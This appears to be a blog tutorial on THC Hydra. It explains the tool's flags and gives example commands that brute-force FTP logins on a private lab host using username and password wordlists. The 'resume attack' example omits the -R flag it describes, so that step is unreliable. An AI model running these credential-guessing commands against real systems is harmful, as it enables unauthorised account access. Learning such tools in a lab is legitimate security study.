In this post, you will learn what is thc-hydra and how does it work and also you will learn all the commands in the tool.
Below is the video format of the post, Please check it out 👇🏾
What is hydra
THC Hydra stands for “The hackers choice” Hydra.
This a hacking tool, it is a very powerful password cracking tool. I think you may come across the john the ripper tool, even this tool is used for password cracking.
The difference between John the ripper and the hacker choice hydra is John the ripper works offline and The hackers choice hydra (Hydra) works online.
Download thc hydra from here [Click here]
Useful commands in hydra tool
- -R: restore a previous aborted/crashed session
- -S: perform an SSL connect
- -s: PORT if the service is on a different default port, define it here
- -l LOGIN or -L: FILE login with LOGIN name, or load several logins from FILE
- -p PASS or -P: FILE try password PASS, or load several passwords from FILE
- -o FILE : write found login/password pairs to FILE instead of stdout
- -4 / -6 : prefer IPv4 (default) or IPv6 addresses
How to crack password using hydra tool
Just follow the below examples and I am very much sure by end of the blog post, You will be familiar with the tool.
Have any doubt comment down below or watch the video I made on thc hydra.
Example1, Using specific username and password
Below is the command for specific username and password
hydra -l msfadmin -p msfadmin 192.168.1.37 ftp
After you enter the username and password enter the target, then specify the service you are atatcking.
Example2, Using multiple username and password
To use multiple usernames and password list just enter capital -L and -P
hydra -L username.txt -P password.txt 192.168.1.37 ftp -v
-L: List of usernames
-P: List of password
Then enter the service your are attacking and finally I have added the -v (verbose)
Example3, Using debug mode in hydra
The debug mode gives you more clarification on what is happening.
hydra -L username.txt -P password.txt 192.168.1.37 ftp -v -d
Example4, Save the result
To save the result you can use the -o command
hydra -L username.txt -P password.txt 192.168.1.37 ftp -o msfadmin.txt
Example5, Resume attack
To resume an attack, You can just enter -R, Mostly you will resume an attack if it takes a long time to crack the password.
If you wanted to resume an attack make sure that currectly running attacks logs are saved.
hydra -L username.txt -P password.txt 192.168.1.37 ftp
Example6, Attacking on specific port
To attack on specific port enter the -s command, Instead of entering service you can specify the port and attack.
hydra -L username.txt -P password.txt 192.168.1.37 ftp -s 21
Example7, Password cracking on multiple target
Using hydra tool you can also perform multiple brute force attacks. And you have to specify the host file after -M command like this
hydra -L username.txt -P password.txt -M host1.txt ftp -s 21
My final thoughts on hydra is Awesome. My first choice is medusa and then it is hydra. Hydra is the only online password cracking tool which has got colourful interface.
Also Read: John the ripper full tutorial
Also Read: Ncrack password cracking tool